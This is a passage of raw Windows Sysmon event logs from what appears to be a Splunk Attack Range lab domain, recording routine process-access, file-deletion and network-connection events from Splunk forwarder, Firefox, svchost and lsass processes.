07:59:54.365{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051970Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:59:54.365{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051969Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:54.365{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051968Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:54.365{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F67A-60EB-9F7D-00000000CF01}5260C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051967Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:54.328{466BC892-F67A-60EB-9F7D-00000000CF01}5260C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
354300x80000000000000001051966Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:45.584{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51138-false10.0.1.12-8000- 23542300x8000000000000000808952Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:55.729{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28D5D719DE231FB48986C9BE39142E2A,SHA256=C7E23359E96B7C1629649C3A4A359760263648A9AA07B00318C4C5C2E747DB83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051977Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:55.536{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=390A72C32D97AB72FD4EA00426CAC918,SHA256=FB6DBC7814ADF3D5227037DD34CE0ACE1F8CB8D8E51A7F170CCF68BBA7267807,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808951Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:55.198{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2F0DE248AB634C0E3816254076BD28E3,SHA256=1E04915CF7A297560B239861BDA3B1FF8B8EF54BD2ECC51981D742F7FA61803A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808950Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:59:55.198{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BFF8F08C52B80FBD0952FD8B56D1696B,SHA256=D18452EB615E01D1A1A837E747A50D485BA2D2CB8C19AB836B44497A91BFBD08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051976Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:55.335{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=825F8FCA44B8CC3B7DCC22F4E213EB6A,SHA256=30F498C7AA5173591684E8BC826334A4890253F2ADD503697C8DC7F2B0972160,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808954Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:56.731{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37CCB20D9B28A1D8D660E2CE602E4DFB,SHA256=9FC17C1252A8B59A9186C25C8108F710EE84DD43CF3FFECE2A937CC37BE3495F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051979Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:56.550{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5658A55A08D29ED7405BF2604EDAD120,SHA256=87871B9D3F73744667A3C42712D0D5D63A7DEE35B9571232CE357B542F7D1E8F,IMPHASH=00000000000000000000000000000000falsetrue 
354300x8000000000000000808953Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:54.340{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57363-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 354300x80000000000000001051978Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:47.725{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57363-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x8000000000000000808955Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:57.746{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C87C98B614A9053557DA5B85B359CD99,SHA256=C42C9BF75D088BDB814387CF5FFED729BE2D20BBEC82EB3F2E251148D017A778,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051981Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:57.581{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9836B041FC12303B13831D7231C36C9,SHA256=DBC1CBCE23C3312242DF8CED5383C3191ADB6D8C436AA170D20DAA9A4F5D566F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051980Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:57.181{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program 
Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808956Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:58.762{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EF20955A3E0EA7EC20FD0ACFCC5C539,SHA256=11D0AC644AB8EF7CA06F16449DE3D1E3EE4440B43C71B74D9678C7779616B03F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051982Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:58.581{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E728FB19D4CA1323F72E11EF15D6C75,SHA256=E170D07B4DB8BE94AF0E525F298CA44F900224DFFE047CE5C3FAF0A8BF3D4B2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808957Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:59.793{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5DE8B897249675CDE0753AA91FADC0D,SHA256=A4A0E86AB32411977EA1FA71BA59116491094752C109FE4F4F53FBA149BAFBB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051985Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:59.582{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D06B6A33CB544398BDA9885CF5CDB479,SHA256=BF86D6CF2A53A43D6708A56CE4F654AB0612E855BE21056F3FF60C4F7F64BD12,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051984Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:50.716{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51140-false10.0.1.12-8000- 354300x80000000000000001051983Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:50.701{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51139-false10.0.1.12-8089- 23542300x8000000000000000808959Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:00.793{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9769F824D92A8D9A96D77CA4FBC1B468,SHA256=77DB7B6E2D9C7021BBA4F7AC101C23040D556CAA63B53BDF49958A45FF0F3307,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051987Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:00.800{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\axpgvkas.default-release\datareporting\aborted-session-pingMD5=A819E972D627AB2D7B1E8DEA0BDE7322,SHA256=8C0596E29A345A87A4C3786A3F0D04CF6ED8339A7476E37348ED2D001D489F07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051986Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:00.583{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BBF474A1603EEC42AE865DE84CE7863D,SHA256=2542AEAE2620FDB9C0A9F03233C96C54790FADEA4C56C72937A1A5C96305E475,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808958Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:58.316{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57364-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808960Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:01.809{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29424AD4E01E585297608DE110B13535,SHA256=343962CF7F14886A7523746841E0D59BA1B871FF624F7324151AC0A3D5601EFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051991Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:01.590{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0724D6DD272144C404080ABF219EDC3,SHA256=DAA62D9A434FEDE3B169F565EB258794124C1EEB2726AF6F44811CFECFFBD76A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051990Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:52.914{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-59604-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001051989Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:01.052{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7D785BE59207A68343C99C24550667EF,SHA256=A99372636DCF85E0F387EA27F09CE8D2D132CBD95CE30E95608DB98E737AA93F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051988Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:01.052{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=038625DBCE66D718A4E0893366DA3617,SHA256=6CC086BC049D6EF1479EC3ACDE22684F2458C519B69B7A4D923E2F51E87974A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808961Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:02.840{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F69ADEB1F399A916213D07D70A7D30C1,SHA256=0F4DC384F96BB77397B38FD10C87B49FA8924AC09B0167C71604339C8679A694,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051992Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:02.607{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00BE509FCF615183A0BB83A1EC7C38BD,SHA256=E012DD4FEB4FB1E8C021DA1A67740EE8C41D73EE02292B0EF613B7976685BC03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808962Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:03.856{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F277850754E5B46D3F1FF92E22031E39,SHA256=8F66F868AD92716BF6B62F4724825C96F0B490463F91388FFC48589A3AB1FB42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051993Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:03.626{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5AB3F175D90248E87A1EFC3571983A3,SHA256=5D842DE9B45BE5A488051D53C84B8AFE0ACDA16D481047D1DF6D46F07526A92F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808963Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:04.887{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF0B3A4E5ED4A753C9BEF8442A172467,SHA256=341504E99EEE720384FA928D3FE3B928412A9976F8704E649D5988BA51B5BD73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051995Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:04.656{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73CF7815064DFD28569A6FF78AA94B32,SHA256=C8FF80703DCA964C18C4D911DA45501FD1CB263E2DCD319CD791331A197CF1C0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051994Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:56.624{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51141-false10.0.1.12-8000- 23542300x8000000000000000808965Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:05.918{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41D379D6CB80CA65672B9D404DEB49EA,SHA256=81AF90B1B9A437CC1FF2A46870E0E128A306CD155B44897266CB86C943D87869,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051996Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:05.671{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00B83E6F2D2F72C6B7773FB94AFA4FC0,SHA256=88AE25C1C13CB0DDFE9450D7723EBDE603DC0DE62259254ECE061E65384EF50B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808964Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:04.332{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57365-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808966Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:06.949{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0820F0076FF4DDD7E6919BF6F183C77,SHA256=A62F6BCA09FC17F18AE47C5036E40E10A1993E88DFA15BC6A75822742B736450,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052002Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:06.686{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D52F1D86758654F8FBFC8ED802C04BC,SHA256=7ACF6587B6E43A79D50D41B6F14DBE4B2A5255E2A9E72946EC6CC6F1A2DA5926,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052001Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:06.440{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052000Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:06.324{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-57B0-60E8-6810-00000000CF01}7548C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla 